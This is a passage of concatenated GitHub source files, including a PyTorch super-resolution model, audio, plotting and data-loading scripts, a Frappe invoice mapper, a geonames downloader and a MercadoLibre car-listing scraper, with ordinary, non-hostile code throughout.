nn.Sequential(\r\n\t\t\tnn.Conv2d(channels, int(4*angRes * angRes * channels), kernel_size=1, stride=1, padding=0, bias=False),\r\n\t\t\tnn.PixelShuffle(2*angRes),\r\n\t\t)\r\n\r\n\t\t# define module attention fusion feature\r\n\t\tself.attention_fusion = AttentionFusion(channels)\r\n\t\t\t\t\t\t\t\t\t\t\t\r\n\t\t# define module spatial residual group\r\n\t\tself.SRG = nn.Sequential( nn.Conv2d(5*channels, channels, kernel_size=1,stride =1,dilation=1,padding=0, bias=False),\r\n\t\t ResidualGroup(self.n_blocks, channels,kernel_size=3,stride =1,dilation=int(angRes), padding=int(angRes), bias=False))\r\n\r\n\r\n\tdef forward(self, x):\r\n\r\n\t\t# MO-EPI feature extractor\r\n\t\tdata_0, data_90, data_45, data_135 = MacPI2EPI(x,self.angRes)\r\n\r\n\t\tdata_0 = self.head_epi(data_0)\r\n\t\tdata_90 = self.head_epi(data_90)\r\n\t\tdata_45 = self.head_epi(data_45)\r\n\t\tdata_135 = self.head_epi(data_135)\r\n\t\r\n\t\tmid_merged = torch.cat((data_0, data_90, data_45, data_135), 1)\r\n\t\tx_epi = self.epi2spa(mid_merged)\r\n\r\n\r\n\t\t# intra/inter spatial feature extractor\r\n\t\tx_s_intra = self.head_spa_intra(x)\r\n\t\tx_s_inter = self.head_spa_inter(x)\r\n\t\r\n\t\t# intra/inter angular feature extractor\r\n\t\tx_a_intra = self.head_ang_intra(x)\r\n\t\tx_a_intra = self.ang2spa_intra(x_a_intra)\r\n\r\n\t\tx_a_inter = self.head_ang_inter(x)\r\n\t\tx_a_inter = self.ang2spa_inter(x_a_inter)\r\n\r\n\t\t# fusion feature and refinement\r\n\t\tout = x_s_intra.unsqueeze(1)\r\n\t\tout = 
torch.cat([x_s_inter.unsqueeze(1),out],1)\r\n\t\tout = torch.cat([x_a_intra.unsqueeze(1),out],1)\r\n\t\tout = torch.cat([x_a_inter.unsqueeze(1),out],1)\r\n\t\tout = torch.cat([x_epi.unsqueeze(1),out],1)\r\n\r\n\t\tout,att_weight = self.attention_fusion(out)\r\n\r\n\t\tout = self.SRG(out)\r\n\r\n\t\treturn out\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n net = Net(5,32, 2).cuda()\r\n from thop import profile\r\n input = torch.randn(1, 1, 160, 160).cuda()\r\n total = sum([param.nelement() for param in net.parameters()])\r\n flops, params = profile(net, inputs=(input,))\r\n print(' Number of parameters: %.2fM' % (total / 1024**2))\r\n print(' Number of FLOPs: %.2fG' % (flops / 1024**3))\r\n","repo_name":"duongvinh/HLFSR-SSR","sub_path":"code/model_HLFSR.py","file_name":"model_HLFSR.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"15527538697","text":"# user_profile\n\ndef build_profile(first, last, **user_info):\n profile = {}\n profile['first_name'] = first\n profile['last_name'] = last\n for key, value in user_info.items():\n profile[key] = value\n return profile\n\nuser_profile = build_profile('Rodrigo', 'Lourenco',\nlocation='Krakow',\nfield='Engineering')\nprint(user_profile)","repo_name":"panlourenco/exercises-coronapython","sub_path":"chapter_08/chapter_8_8_13.py","file_name":"chapter_8_8_13.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9033386510","text":"import sox\nimport numpy as np\nfrom typing import List\nfrom audio.audio_array import AudioArray\nfrom audio.audio_source import AudioSource\n\n# yaml object\n# ---\n# type: Combiner\n# combine_type: 'mix-power' # or... 
concatenate merge mix multiply see https://pysox.readthedocs.io/en/latest/api.html#sox.combine.Combiner.build\n# inputs:\n# - type: AudioFile\n# filepath: audio.mp3\n# - type: Phaser\n# input:\n# type: AudioFile\n# filepath: audio.mp3\n# gain_in: 0.8\n# gain_out: 0.74\n# delay: 3\n# decay: 0.4\n# speed: 0.5\n# modulation_shape: sinusoidal # or triangular\n# - type: Pitch\n# input:\n# type: AudioFile\n# filepath: audio.mp3\n# amount: 1\n\nclass Combiner(AudioSource):\n def __init__(self, inputs: List[AudioSource], combine_type: str='mix-power') -> None:\n super().__init__()\n self.__inputs = inputs\n self.__combine_type = combine_type\n\n def get_array(self) -> AudioArray:\n combiner = sox.Combiner()\n input_files = [input.get_temp_file() for input in self.__inputs]\n combiner.build(\n input_filepath_list=input_files, \n output_filepath=self._temp_filepath, \n combine_type=self.__combine_type\n )\n return AudioArray(\n array=sox.Transformer().build_array(input_filepath=self._temp_filepath),\n sample_rate=sox.file_info.sample_rate(input_filepath=self._temp_filepath)\n )\n\n","repo_name":"MadLadLabs/audio-pipe","sub_path":"src/audio/combiner.py","file_name":"combiner.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"26217238408","text":"import os\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn import model_selection\nimport cv2\n\n\ndef preprocess_image(image):\n\n image = image[70:140,:,:]\n image = cv2.resize(image,(128,32))\n\n return image\n\n\ndef get_csv_data():\n\n CENTER,LEFT,RIGHT,STEERING,THROTTLE,BRAKE,SPEED=range(7)\n\n driving_log = pd.io.parsers.read_csv('./SimulatorTraining/driving_log.csv').to_numpy()\n\n count = len(driving_log)\n ileft = np.random.choice(count,count//2,replace=False)\n iright = np.random.choice(count,count//2,replace=False)\n\n data=driving_log[:,[CENTER,STEERING,THROTTLE,BRAKE,SPEED]]\n\n left_data=driving_log[:,[LEFT,STEERING,THROTTLE,BRAKE,SPEED]] [ileft , :]\n right_data=driving_log[:,[RIGHT,STEERING,THROTTLE,BRAKE,SPEED]] [iright , :]\n\n # in the 5-column slices above the steering angle is column 1;\n # indexing with STEERING (=3) would shift the brake column instead\n left_data[:,[1]]=left_data[:,[1]] + 0.25\n right_data[:,[1]]=right_data[:,[1]] - 0.25\n\n data=np.concatenate( (data,left_data) )\n data=np.concatenate( (data,right_data) )\n\n np.random.shuffle(data)\n\n train, valid = model_selection.train_test_split(data, test_size=.2)\n\n return train,valid\n\n\ndef get_batch_data(batch):\n IMG,STEERING,THROTTLE,BRAKE,SPEED=range(5)\n x,y = [],[]\n for row in batch:\n image = preprocess_image(plt.imread( \"SimulatorTraining/\" + row[IMG]))\n angle = row[STEERING]\n x.append( image )\n y.append( angle )\n x.append( image[:,::-1,:] )\n y.append( -1 * angle )\n\n return np.array(x),np.array(y)\n\ndef generate_samples(data,batch_size=128):\n while True:\n for bnext in range(0, len(data), batch_size):\n batch=data[bnext:bnext+batch_size]\n x,y=get_batch_data(batch)\n yield (x,y)\n\n","repo_name":"praveenmarothu/P3-Behavioral-Cloning","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"12723590378","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#################### READING THE DATA #################################\nvoltage = []\ndata = np.loadtxt('data.txt', dtype = int)\nvoltage = [i / 256 *3.3 for i in data] \nwith open('settings.txt', mode 
= 'r') as settings:\n frequency = float(settings.read().split('\\n')[0])\n\nx = np.linspace(0, len(voltage)*frequency, len(voltage))\nvoltage = np.array(voltage)\nmax_elem_id = np.argmax(voltage)\nzaryad = frequency * (max_elem_id + 1)\nrazryad = frequency * (len(voltage) - 1 - max_elem_id)\ntime = frequency * len(voltage)\n################## PLOT DISPLAY SETTINGS ########################\ntitle = 'Charging and discharging of a capacitor in an RC circuit'\n\nfig, ax = plt.subplots()\nax.plot(x, voltage, 'g.-', label = 'V (t)')\nax.text(0.75 * time, 2, f'Charge time = {zaryad} s.',\n fontsize = 11,\n color = 'r',\n wrap = True)\nax.text(0.75 * time , 1.5, f'Discharge time = {razryad} s.',\n fontsize = 11,\n color = 'r',\n wrap = True)\nax.minorticks_on()\nax.grid(which = 'major',\n color = 'k',\n linewidth = 1)\nax.grid(which = 'minor',\n color = 'k',\n linestyle = ':')\nax.set(xlim = (x.min(), x.max()), ylim = (voltage.min(), voltage.max()))\nplt.title(title, wrap = True)\nfig.set_figwidth(12)\nfig.set_figheight(8)\nplt.xlabel('Time, s')\nplt.ylabel('ADC reading, Volts')\nplt.legend()\nplt.show()\nfig.savefig('graph.svg')\nfig.savefig('graph.png')","repo_name":"yavnolib/graph_oip","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"13055504192","text":"# coding=utf-8\nfrom STULogin import STULogin\nfrom bottle import *\nimport json\nimport BooksAPI\nimport os\nimport time\nfrom BookRetrieval import BookRetrieval\n\ndef returnJSON(code,data):\n return json.dumps({\n \"error_code\":code,\n \"data\" : data\n }\n )\n\n@get(\"/\")\ndef index():\n # print(os.curdir)\n return static_file(\"index.html\",\"www\")\n\n@get(\"/isbn/<isbn>\")\ndef getBookInfoByISBN(isbn): \n rst = BooksAPI.getBookInfoByISBN(isbn)\n if rst == None:\n return returnJSON(-1,\"No book information found for ISBN:{0}. Please first check whether the ISBN was recognized correctly\".format(isbn))\n else:\n return returnJSON(0,rst)\n\n@get(\"/login\")\ndef login():\n sid = request.query.sid\n pwd = request.query.pwd\n stu = STULogin(sid,pwd)\n #\n if stu.needCaptcha():\n return returnJSON(-3,\"Too many attempts, please try again later. Or go to i.xmu.edu.cn to reset your password\")\n if stu.login()==None:\n data={\n \"student\" : stu.getStuInfo()\n }\n return returnJSON(0,data)\n else:\n return returnJSON(-1,stu.loginFailedReason)\n\n@get(\"/book_retrieval/<qry>\")\ndef book_retrieval(qry): \n books = br.user_search(qry)\n return returnJSON(0,books)\n\ndef load_config(path):\n f = open(path,\"r\")\n data=f.read()\n obj=json.loads(data)\n return obj\n\nif __name__ == \"__main__\": \n config_path= os.path.join(os.path.split(__file__)[0],\"../config.json\")\n config=load_config(config_path)\n br = BookRetrieval(config) \n print(\"[*] This service handles login, ISBN info extraction, etc...\")\n port = int(config[\"pyAddr\"].split(\":\")[-1])\n # The API can only be called from this machine; runs single-threaded by default\n run(host=\"localhost\", port=port)","repo_name":"vcvycy/XLibrary","sub_path":"API/py_service/StartService.py","file_name":"StartService.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
+{"seq_id":"38851361234","text":"'''\nExercise 2: Write another program that prompts for a list of numbers\nas above and at the end prints out both the maximum and minimum of\nthe numbers instead of the average.\n'''\nnum = \"\"\ncount = 0\ntotal = 0 \nnum_max = None\nnum_min = None\nwhile num != \"done\":\n try:\n num = input(\"Enter a number :\")\n if num == \"done\":\n break\n else:\n num = int(num)\n count = 
count + 1\n total = num + total\n if num_max is None:\n num_max = num\n if num_min is None:\n num_min = num\n if num > num_max:\n num_max = num\n if num < num_min:\n num_min = num\n\n except ValueError: # non-numeric input\n print(\"Invalid Input\")\n continue\nprint(\"\\nTotal: \",total,\"\\nNumber's Count: \",count,\"\\nMax: \",num_max,\"\\nMin: \",num_min)","repo_name":"andresnunes/Projetos_Python","sub_path":"Projetos_Python/Exercicios-Livro-PythonForEverybody/5Ex2.py","file_name":"5Ex2.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"1387903485","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom frappe.model.mapper import get_mapped_doc\nfrom frappe.utils import cint, flt\nfrom frappe.utils import add_days, getdate, formatdate, get_first_day, date_diff, add_years, get_timestamp\n\nfq_status_map = {\n 0: \"Draft\",\n 1: \"Submitted\",\n 2: \"Cancelled\"\n}\n\nclass FarmerQuotation(Document):\n def validate(self):\n self.set_status_from_docStatus()\n pass\n\n def set_status_from_docStatus(self):\n if self.status != \"Promoted\":\n self.status = fq_status_map[self.docstatus or 0]\n\n@frappe.whitelist()\ndef make_purchase_invoice(source_name, target_doc=None):\n def set_missing_values(source, target):\n target.ignore_pricing_rule = 1\n set_supplier(source, target)\n target.run_method(\"set_missing_values\")\n target.run_method(\"calculate_taxes_and_totals\")\n target.save()\n source.purchase_invoice = target.name\n source.status = \"Promoted\"\n # frappe.throw((\"Due Date {0} cannot be before Posting Date {1}\").format(target.due_date, target.posting_date))\n\n source.save()\n frappe.db.commit()\n\n def set_supplier(source, target):\n farmer = frappe.get_doc(\"Farmer\", source.get('farmer'))\n\n if not frappe.db.exists('Supplier Type', 'Farmer'):\n supplier_type = frappe.new_doc('Supplier Type') # doctype name must match the exists() check above\n supplier_type.supplier_type = 'Farmer'\n supplier_type.save(ignore_permissions=True)\n frappe.db.commit()\n\n supplier = frappe.db.get_value('Supplier', {\"supplier_name\": farmer.get('title')}, [\"name\", 'supplier_name'], as_dict=1)\n\n if supplier is None:\n supplier_doc = frappe.new_doc('Supplier')\n supplier_doc.name = farmer.get('name')\n supplier_doc.supplier_name = farmer.get('title')\n supplier_doc.image = farmer.get('image')\n supplier_doc.supplier_type = 'Farmer'\n supplier_doc.supplier_details = farmer.get(\"address\")+ \"\\r\\n\"+ farmer.get('bank_account')+ \"\\r\\n\"+ farmer.get('bank_ifsc')+ \"\\r\\n\"+ farmer.get('bank_name')\n supplier_doc.save()\n frappe.db.commit()\n\n supplier = frappe.db.get_value('Supplier', {\"supplier_name\": farmer.get('title')}, [\"name\", 'supplier_name'], as_dict=1)\n\n if not frappe.db.exists('Supplier', supplier.get('name')):\n frappe.throw((\n 'Could not create supplier from farmer frappe.db.exists(\"Supplier\", ID) failed for {0}')\n .format(supplier.get('name')))\n\n credit_days_based_on, credit_days, supplier_type = \\\n frappe.db.get_value('Supplier', supplier.get('name'), [\"credit_days_based_on\", \"credit_days\", \"supplier_type\"])\n\n target.supplier = supplier.get('name')\n\n doclist = get_mapped_doc(\"Farmer Quotation\", source_name, {\n \"Farmer Quotation\": {\n \"doctype\": \"Purchase Invoice\",\n \"validation\": {\n \"docstatus\": [\"=\", 1],\n \"status\": [\"=\", \"Submitted\"],\n \"quotation_type\": [\"=\", \"Procurement\"]\n },\n \"field_map\": {\n \"transaction_date\": \"posting_date\",\n  
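# note (editor): the quotation's transaction_date is copied into the new invoice's posting_date\n  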
\"grand_total\": \"grand_total\",\n \"in_words\": \"in_words\",\n \"currency\": \"currency\",\n \"conversion_rate\": \"conversion_rate\",\n \"name\": \"title\"\n }\n },\n \"Farmer Quotation Item\": {\n \"doctype\": \"Purchase Invoice Item\",\n \"field_map\": {\n \"item_code\": \"item_code\",\n \"item_name\": \"item_name\",\n \"grade\": \"grade\",\n \"qty\": \"qty\",\n \"uom\": \"uom\",\n \"rate\": \"rate\",\n \"amount\": \"amount\",\n }\n }\n # ,\n # \"Sales Taxes and Charges\": {\n # \"doctype\": \"Sales Taxes and Charges\",\n # \"add_if_empty\": True\n # },\n # \"Sales Team\": {\n # \"doctype\": \"Sales Team\",\n # \"field_map\": {\n # \"incentives\": \"incentives\"\n # },\n # \"add_if_empty\": True\n # }\n }, target_doc, set_missing_values)\n\n return doclist\n","repo_name":"shahzorkhan/fpo","sub_path":"fpo/fpo/doctype/farmer_quotation/farmer_quotation.py","file_name":"farmer_quotation.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5591889281","text":"import os\nfrom lxml import etree\nfrom datetime import datetime, date\nimport pandas as pd\nimport shutil\n\ndef timestamp_naf(path_to_doc):\n \"\"\"load NAF file and extract title, publication date nd uri\"\"\"\n doc_tree = etree.parse(path_to_doc)\n root = doc_tree.getroot()\n target = root.find('nafHeader/fileDesc')\n creation_time = target.get('creationtime')\n title = target.get('title')\n target2 = root.find('nafHeader/public')\n uri = target2.get('uri')\n title_time = {'title':title, 'creation time': creation_time, 'uri':uri}\n return title_time\n\ndef timestamps_collection(collection):\n \"\"\"load collection of naf files and extract list of publication dates\"\"\"\n timestamps = []\n\n for file in collection:\n timestamp = timestamp_naf(file)\n timestamps.append(timestamp)\n return timestamps\n\ndef time_in_correct_format():\n \"Function that returns the current time (UTC)\"\n datetime_obj = datetime.now()\n return datetime_obj.strftime(\"%Y-%m-%dT%H:%M:%SUTC\")\n\ndef range_of_dates(event_date):\n \"\"\"returns a list with a range of dates between the event date and the current date\"\"\"\n bottom_date = datetime(1677,9,23)\n\n if event_date.date() < bottom_date.date():\n event_date = \"1677-09-23\"\n print('Warning: bottom value as default for this event date. 
Real event date not implemented in pandas time frame')\n else:\n event_date = str(event_date)[:-9]\n\n current_date = time_in_correct_format()[:-12]\n mydates = pd.date_range(event_date,current_date).tolist()\n\n range_of_dates = []\n\n for date in mydates:\n date = str(date.date())\n range_of_dates.append(date)\n return range_of_dates\n\ndef validate_publication_date(event_date, timestamps):\n \"\"\"validates whether the publication date is within the range of the event date and the current date\"\"\"\n known_dates = []\n unknown_dates = []\n\n dates = range_of_dates(event_date)\n\n for timestamp in timestamps:\n timestamp_stripped = timestamp['creation time'][:-12]\n if timestamp_stripped in dates:\n known_dates.append(timestamp)\n else:\n unknown_dates.append(timestamp)\n return known_dates, unknown_dates\n\ndef calculate_difference(list_of_timestamps, event_date):\n \"\"\"calculates the difference between the publication dates and the event date and creates new list with extended dictionaries\"\"\"\n event_date_replace = str(event_date).replace('-',',')\n event_date = event_date_replace[:10]\n event_year = int(event_date[:4])\n event_month = int(event_date[5:7])\n event_day = int(event_date[8:])\n\n known_distance = []\n\n for info in list_of_timestamps:\n timestamp = info['creation time']\n timestamp_replace = timestamp.replace('-',',')\n text_date = timestamp_replace[:10]\n text_year = int(text_date[:4])\n text_month = int(text_date[5:7])\n text_day = int(text_date[8:])\n f_date = date(event_year,event_month,event_day)\n l_date = date(text_year,text_month,text_day)\n delta = l_date - f_date\n info['historical distance'] = delta.days\n return list_of_timestamps\n\ndef categorize_in_time_buckets(known_distance,time_buckets):\n '''extend dictionary with categorization of the historical distance in time buckets'''\n\n for info in known_distance:\n for key, value in time_buckets.items():\n if info['historical distance'] in value:\n time_bucket = key\n info['time bucket'] = time_bucket\n if \"time bucket\" not in info:\n default_bucket = \"outside bucket range\"\n info['time bucket'] = default_bucket\n print(\"Warning: historical distance falls outside of time bucket range.\")\n return known_distance\n\ndef create_output_folder(output_folder,start_from_scratch):\n '''creates output folder for export dataframe'''\n folder = output_folder\n\n if os.path.isdir(folder):\n if start_from_scratch == True:\n shutil.rmtree(folder)\n\n if not os.path.isdir(folder):\n os.mkdir(folder)\n\ndef timestamps_to_format(known_timestamps,unknown_timestamps,xlsx_path,output_folder,start_from_scratch):\n \"\"\"\n lists of dictionaries to excel\n \"\"\"\n headers = ['title', 'timestamp', 'historical distance','time bucket','uri']\n\n list_of_lists = []\n\n for info in known_timestamps:\n one_row = [info['title'],info['creation time'],info['historical distance'],info['time bucket'],info['uri']]\n list_of_lists.append(one_row)\n for info in unknown_timestamps:\n a_row = [info['title'],info['creation time'], 'unknown','unknown',info['uri']]\n list_of_lists.append(a_row)\n\n df = pd.DataFrame(list_of_lists, columns=headers)\n\n if output_folder != None:\n create_output_folder(output_folder=output_folder,\n start_from_scratch=start_from_scratch)\n df.to_excel(xlsx_path, index=False)\n return df\n","repo_name":"cltl/historical_distance","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
+{"seq_id":"37143496377","text":"from keras.models import Model\nfrom keras.layers import Input, Dense, Conv2D, Activation, MaxPool2D, Dropout, Flatten,normalization,regularizers\n\ndef cifar10_network(input_shape=(32, 32, 3), class_num=10):\n \"\"\"CIFAR CNN\n\n Keyword Arguments:\n input_shape {tuple} -- shape of input images. Should be (32,32,3) for CIFAR\n class_num {int} -- number of classes. Should be 10 for CIFAR10\n\n Returns:\n model -- keras.models.Model() object\n \"\"\"\n\n im_input = Input(shape=input_shape)\n times = 0\n while times < 5:\n # chain from t after the first block; feeding im_input on every iteration would discard the layers already built\n t = Conv2D(filters=64, kernel_size=(3,3), strides=(1,1), padding='valid', data_format='channels_last')(im_input if times == 0 else t)\n t = Conv2D(filters=64, kernel_size=(3, 3), strides=(1,1), padding='valid', data_format='channels_last')(t)\n #t= normalization.BatchNormalization(epsilon=1e-06, mode=0, axis=-1, momentum=0.9, weights=None, beta_init='zero', gamma_init='one')(t)\n t = Activation('relu')(t)\n t = Dropout(rate=0.4, seed=True)(t)\n t = MaxPool2D(pool_size=(3,3), strides=(1,1), padding='valid', data_format='channels_last')(t)\n times = times + 1\n\n t = Flatten()(t)\n t = Dense(units=class_num)(t)\n output = Activation(activation='softmax')(t)\n model = Model(inputs=im_input, outputs=output)\n return model\n","repo_name":"MartinYan623/CS5242-Neural-Networks-and-Deep-Learning","sub_path":"Assignment2/Part2/source/cifar10_network.py","file_name":"cifar10_network.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"13782638087","text":"\"\"\"This script downloads data and parses from geonames.org, then\nsaves it to a file for use by the History Atlas's fake data generator.\n\"\"\"\n\nfrom collections import namedtuple\nimport json\nimport os\nfrom zipfile import ZipFile\nimport requests\n\n\nGEONAMES_URL = 'https://download.geonames.org/export/dump/cities15000.zip'\nSRC_DATA_DIR = input('\\n\\nPlease enter the full path of the output directory:\\n')\nif not os.path.isdir(SRC_DATA_DIR):\n raise Exception(f'Provided path {SRC_DATA_DIR} is not a directory.')\nOUT_FILENAME = SRC_DATA_DIR + 'cities.json'\ncities = list()\nCoordinates = namedtuple('Coordinates', ['longitude', 'latitude'])\n\nupper_left_coord = Coordinates(\n # La Concepción, Chiriquí\n longitude = -82.7,\n latitude = 8.6)\nlower_right_coord = Coordinates(\n # King Edward Point\n longitude = -54.3,\n latitude = -36.5)\n\ndef is_in_box(longitude: float, latitude: float) -> bool:\n \"\"\"utility function to check if coordinates are inside the box defined \n by upper_left_coord and lower_right_coord.\"\"\"\n if longitude > upper_left_coord.longitude \\\n and longitude < lower_right_coord.longitude \\\n and latitude < upper_left_coord.latitude \\\n and latitude > lower_right_coord.latitude:\n return True\n else:\n return False\n\nCityRow = namedtuple('Row', [\n 'geoname_id',\n 'name',\n 'ascii_name',\n 'alternate_names',\n 'latitude',\n 'longitude',\n 'modification_date' # yyyy-mm-dd\n])\n\n# get the data from geonames.org\nresponse = requests.get(GEONAMES_URL)\nif not response.status_code == requests.codes.ok:\n print(response.text) # response.json is a method object; show the raw body instead\n raise Exception('Unable to get Geonames data because an exception occurred.')\n\n# write the data to a zip file\nzipfile_name = SRC_DATA_DIR + 'geonames.zip'\nwith open(zipfile_name, 'wb') as f:\n f.write(response.content)\n\n# extract the zip file to text file\nwith ZipFile(zipfile_name) as z:\n # these zip files should all just have one txt file\n textfile_name = 
z.extract(z.namelist()[0], path=SRC_DATA_DIR)\n\n# read and parse the text file\nwith open(textfile_name, 'r') as f:\n for line in f.readlines():\n tmp_row = line.split('\\t')\n row = CityRow(\n geoname_id = int(tmp_row[0]),\n name = tmp_row[1],\n ascii_name = tmp_row[2],\n alternate_names = tmp_row[3],\n latitude = float(tmp_row[4]),\n longitude = float(tmp_row[5]),\n modification_date = tmp_row[18])\n if is_in_box(\n longitude=row.longitude,\n latitude=row.latitude):\n cities.append({\n 'geoname_id': row.geoname_id,\n 'name': row.name,\n 'ascii_name': row.ascii_name,\n 'alternate_names': row.alternate_names,\n 'latitude': row.latitude,\n 'longitude': row.longitude,\n 'modification_date': row.modification_date\n })\n\nwith open(OUT_FILENAME, 'w') as f:\n json.dump(cities, f)\nprint(f'Finished processing {len(cities)} places.')\n","repo_name":"joshua-stauffer/thehistoryatlas","sub_path":"builder/scripts/build_geo_src.py","file_name":"build_geo_src.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"42241974429","text":"import re\nimport numpy as np\n\n\ndef load_vectors(path):\n vectors = {}\n\n with open(path, \"r\") as infile:\n infile.readline()\n\n for line in infile:\n elements = line.strip().split(\" \")\n word = elements[0]\n vector = []\n for element in elements[1:]:\n vector.append(float(element))\n\n vectors[word] = np.array(vector)\n\n return vectors\n\n\ndef clean_text(text):\n text = text.strip().lower()\n text = re.sub(\"ё\", \"е\", text)\n text = re.sub(\"[^а-я0-9a-z ]\", \" \", text)\n return \" \".join(text.split())\n\n\ndef get_words(text, min_len=0):\n text = clean_text(text)\n words = text.split()\n words = [word for word in words if len(word) >= min_len]\n return words\n\n\ndef match_with_year(start_year, user_answer):\n start_year = str(start_year)\n for word in get_words(user_answer):\n if word == start_year:\n return True\n\n return False\n\ndef match_with_answer(true_answer, user_answer):\n true_words = get_words(true_answer, 2)\n user_words = get_words(user_answer, 2)\n\n # logic depends on number of words\n if len(user_words) == 0:\n return False\n\n if len(true_words) == 1:\n return true_words[0] in user_words\n\n # Process special case with one user word\n if len(user_words) == 1:\n if len(true_words) == 1:\n return user_words[0] == true_words[0]\n return False\n\n # check if all words from true_answer in user_answer\n if sum([word in user_words for word in true_words]) == len(true_words):\n return True\n\n # get all user bi-grams\n user_bigrams = [\"_\".join((user_words[i], user_words[i + 1])) for i in range(len(user_words) - 1)]\n true_bigrams = [\"_\".join((true_words[i], true_words[i + 1])) for i in range(len(true_words) - 1)]\n\n # if at least one bigram in common return True\n for user_bigram in user_bigrams:\n if user_bigram in true_bigrams:\n return True\n\n # in all other cases return False\n return False\n\ndef matching(true_answer, user_answer):\n n = 2\n\n final_answer = False\n\n true_words = get_words(true_answer)\n user_words = get_words(user_answer)\n\n if len(user_words) == 0:\n return False\n\n if n > len(user_words):\n n = len(user_words)\n\n if n > 1:\n for i in range(len(true_words) - 1):\n for j in range(len(user_words) - 1):\n if (true_words[i] == user_words[j]) and (true_words[i + 1] == user_words[j + 1]):\n final_answer = True\n else:\n if true_words[0] == user_words[0]:\n final_answer = True\n\n return final_answer\n\n\ndef 
calc_vector_len(vector):\n return np.sqrt(np.sum(vector * vector))\n\n\ndef middle_vector(a, vectors):\n result = np.zeros(300)\n\n words = get_words(a)\n number = 0\n\n for n in range(len(words)):\n word = words[n]\n if word in vectors:\n result = vectors[word] + result\n number += 1\n\n if number > 0:\n result /= number\n\n return result\n\n\ndef calc_vectors_score(first, second, vectors):\n a = middle_vector(first, vectors)\n b = middle_vector(second, vectors)\n\n score = np.sum(a * b) / calc_vector_len(a) / calc_vector_len(b)\n return score\n","repo_name":"sofialyubina/history","sub_path":"history/algorithms/matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
+{"seq_id":"21957887027","text":"import requests\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport os.path\nimport re\nimport json\n\ndomain = 'https://autos.mercadolibre.com.ar/'\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/50.0.2661.102 Safari/537.36'}\n\nresponse = requests.get(domain, headers=headers)\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\n'''while loop to build the list with the links to every results page'''\n\nk = 97\nlinks_paginas = ['https://autos.mercadolibre.com.ar/', 'https://autos.mercadolibre.com.ar/_Desde_49']\n\nwhile k <= 1969:\n links_paginas += ['https://autos.mercadolibre.com.ar/_Desde_' + str(k)]\n k = k + 48\n\n'''for loop to walk through every car listings page'''\n\nj = 0\n\nfor j in range(0, len(links_paginas)):\n url = links_paginas[j]\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n '''get the links of the listings on each page'''\n\n links_pubs = []\n\n for i in range(892, len(soup.findAll('a'))):\n tag = soup.findAll('a')[i]\n href = tag['href']\n if '/MLA-' in href:\n links_pubs += [href]\n\n links_per_page = []\n\n for i in links_pubs:\n if i not in links_per_page:\n links_per_page.append(i)\n\n '''for loop to walk through every listing within a page'''\n\n u = 0\n\n for u in range(0, len(links_per_page)):\n url_public = links_per_page[u]\n print(url_public)\n response = requests.get(url_public, headers=headers)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n '''get the ID of the current listing'''\n\n url_public_str = str(url_public)\n ides = re.findall('\\d+', url_public_str)\n ides = list(map(int, ides))\n ID = max(ides)\n\n '''get the vehicle data'''\n\n datos_vehiculo = {}\n campos = []\n\n for li_tag in soup.findAll('ul', {'class': 'specs-list'}):\n for span_tag in li_tag.find_all('li'):\n value = span_tag.find('span').text\n field = span_tag.find('strong').text\n campos += [field]\n if value != '':\n datos_vehiculo[field] = value\n\n '''get the make and model of the vehicle'''\n\n tag = []\n\n for i in range(17, 18):\n tag = soup.findAll('p')[i].text.replace(' ', '').split('|', 2)\n\n datos_vehiculo['Marca'] = tag[0]\n datos_vehiculo['Modelo'] = tag[1]\n marca = tag[0]\n\n path = './download/ml/' + str(marca).lower().replace(' ', '-') + '/' + str(ID) + '/'\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n '''function to create json files'''\n\n def writetojsonfile(path, data):\n filepathnamewext = path + 'meta.json'\n with open(filepathnamewext, 'w') as fp:\n json.dump(data, fp)\n\n '''create the .json file with the vehicle's characteristics'''
